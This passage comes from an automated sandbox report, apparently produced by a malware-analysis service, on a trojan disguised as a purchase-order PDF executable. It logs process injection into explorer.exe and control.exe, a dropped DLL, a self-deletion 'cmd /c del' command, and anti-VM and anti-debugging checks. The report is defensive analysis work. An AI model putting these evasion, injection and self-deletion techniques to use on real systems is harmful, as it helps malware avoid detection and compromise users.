          Source: PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs PO-230821_pdf.exe
          Source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027BC000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs PO-230821_pdf.exe
          Source: PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000970000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
          Source: PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000CC0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
          Source: PO-230821_pdf.exe, 00000002.00000003.1079126719.00000000007C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: edgegdi.dllJump to behavior
          Source: PO-230821_pdf.exeReversingLabs: Detection: 68%
          Source: PO-230821_pdf.exeVirustotal: Detection: 42%
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeFile read: C:\Users\user\Desktop\PO-230821_pdf.exeJump to behavior
          Source: PO-230821_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO-230821_pdf.exe C:\Users\user\Desktop\PO-230821_pdf.exe
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeProcess created: C:\Users\user\Desktop\PO-230821_pdf.exe C:\Users\user\Desktop\PO-230821_pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-230821_pdf.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeProcess created: C:\Users\user\Desktop\PO-230821_pdf.exe C:\Users\user\Desktop\PO-230821_pdf.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-230821_pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsl6B0F.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/3@9/8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
          Source: PO-230821_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: PO-230821_pdf.exe, 00000000.00000003.1071081018.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000000.00000003.1061552946.0000000003210000.00000004.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000843000.00000004.00000020.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1079126719.000000000069F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1174837585.00000000046A0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1181131787.000000000484A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3558576622.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: PO-230821_pdf.exe, PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000843000.00000004.00000020.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1079126719.000000000069F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1174837585.00000000046A0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1181131787.000000000484A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3558576622.0000000000D10000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeUnpacked PE file: 2.2.PO-230821_pdf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_10002885 push ecx; ret 0_2_10002898
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00407948 push cs; iretd 2_2_00407949
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00419312 pushfd ; retf 2_2_0041931B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041D4F2 push eax; ret 2_2_0041D4F8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041D4FB push eax; ret 2_2_0041D562
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041D4A5 push eax; ret 2_2_0041D4F8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041D55C push eax; ret 2_2_0041D562
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00416508 push eax; retf 2_2_00416533
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_004076E0 push ebx; retf 8491h2_2_00407759
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041CF13 push 8DDE865Dh; iretd 2_2_0041CF18
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00410FBC push ecx; ret 2_2_00410FBE
          Source: C:\Windows\explorer.exeCode function: 3_2_108319B5 push esp; retn 0000h3_2_10831AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10831B02 push esp; retn 0000h3_2_10831B03
          Source: C:\Windows\explorer.exeCode function: 3_2_10831B1E push esp; retn 0000h3_2_10831B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_11399B1E push esp; retn 0000h3_2_11399B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_11399B02 push esp; retn 0000h3_2_11399B03
          Source: C:\Windows\explorer.exeCode function: 3_2_113999B5 push esp; retn 0000h3_2_11399AE7
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_100050C0 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_100050C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-7629
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000B09904 second address: 0000000000B0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000B09B6E second address: 0000000000B09B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-13766
          Source: C:\Windows\SysWOW64\control.exe TID: 6824Thread sleep count: 49 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 6824Thread sleep time: -98000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-8117
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeAPI coverage: 8.8 %
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_024507DA GetSystemInfo,0_2_024507DA
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-7063
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-7284
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-8119
          Source: explorer.exe, 00000003.00000000.1105174160.000000000585F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000Q
          Source: explorer.exe, 00000003.00000000.1122088983.0000000008798000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.1105174160.000000000585F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&11bd2db8&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ntAsync>
          Source: explorer.exe, 00000003.00000002.3585733015.0000000004E10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&11BD2DB8&0&000000W
          Source: explorer.exe, 00000003.00000000.1092924750.0000000001182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000{Q3
          Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841829187.000000000D6D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2843668491.000000000D701000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1092924750.000000000123F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&11bd2db8&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.1092924750.0000000001182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
          Source: explorer.exe, 00000003.00000003.3193378166.0000000004DB7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&11bd2db8&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.1122088983.0000000008798000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&11bd2db8&0&000000
          Source: explorer.exe, 00000003.00000002.3605338155.0000000008939000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_10003685 _memset,IsDebuggerPresent,0_2_10003685
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_100050C0 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_100050C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_100050C0 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_100050C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_10001E8C GetProcessHeap,0_2_10001E8C
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_0245005F mov eax, dword ptr fs:[00000030h]0_2_0245005F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_0245017B mov eax, dword ptr fs:[00000030h]0_2_0245017B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_02450109 mov eax, dword ptr fs:[00000030h]0_2_02450109
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_0245013E mov eax, dword ptr fs:[00000030h]0_2_0245013E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1C0B6 mov eax, dword ptr fs:[00000030h]2_2_00A1C0B6
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A190B8 mov eax, dword ptr fs:[00000030h]2_2_00A190B8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A190B8 mov eax, dword ptr fs:[00000030h]2_2_00A190B8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A190B8 mov eax, dword ptr fs:[00000030h]2_2_00A190B8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A190B8 mov eax, dword ptr fs:[00000030h]2_2_00A190B8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3B090 mov eax, dword ptr fs:[00000030h]2_2_00A3B090
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1B096 mov eax, dword ptr fs:[00000030h]2_2_00A1B096
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1B096 mov eax, dword ptr fs:[00000030h]2_2_00A1B096
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1B096 mov eax, dword ptr fs:[00000030h]2_2_00A1B096
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1B096 mov eax, dword ptr fs:[00000030h]2_2_00A1B096
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ADF097 mov eax, dword ptr fs:[00000030h]2_2_00ADF097
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A500E8 mov eax, dword ptr fs:[00000030h]2_2_00A500E8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ADF0FE mov eax, dword ptr fs:[00000030h]2_2_00ADF0FE
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AE90FB mov eax, dword ptr fs:[00000030h]2_2_00AE90FB
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A570F8 mov eax, dword ptr fs:[00000030h]2_2_00A570F8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A570F8 mov eax, dword ptr fs:[00000030h]2_2_00A570F8
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5D0C0 mov eax, dword ptr fs:[00000030h]2_2_00A5D0C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A5D0C0 mov ecx, dword ptr fs:[00000030h]2_2_00A5D0C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00ADD0C0 mov eax, dword ptr fs:[00000030h]2_2_00ADD0C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A250CD mov eax, dword ptr fs:[00000030h]2_2_00A250CD
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D2 mov eax, dword ptr fs:[00000030h]2_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A450DF mov eax, dword ptr fs:[00000030h]2_2_00A450DF
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AE803E mov eax, dword ptr fs:[00000030h]2_2_00AE803E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AE803E mov eax, dword ptr fs:[00000030h]2_2_00AE803E
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A27032 mov eax, dword ptr fs:[00000030h]2_2_00A27032
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB303A mov eax, dword ptr fs:[00000030h]2_2_00AB303A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB303A mov eax, dword ptr fs:[00000030h]2_2_00AB303A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB303A mov eax, dword ptr fs:[00000030h]2_2_00AB303A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AB303A mov eax, dword ptr fs:[00000030h]2_2_00AB303A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A26034 mov eax, dword ptr fs:[00000030h]2_2_00A26034
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A26034 mov eax, dword ptr fs:[00000030h]2_2_00A26034
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AF5006 mov eax, dword ptr fs:[00000030h]2_2_00AF5006
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A50014 mov eax, dword ptr fs:[00000030h]2_2_00A50014
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A21011 mov eax, dword ptr fs:[00000030h]2_2_00A21011
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A21011 mov eax, dword ptr fs:[00000030h]2_2_00A21011
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A60075 mov eax, dword ptr fs:[00000030h]2_2_00A60075
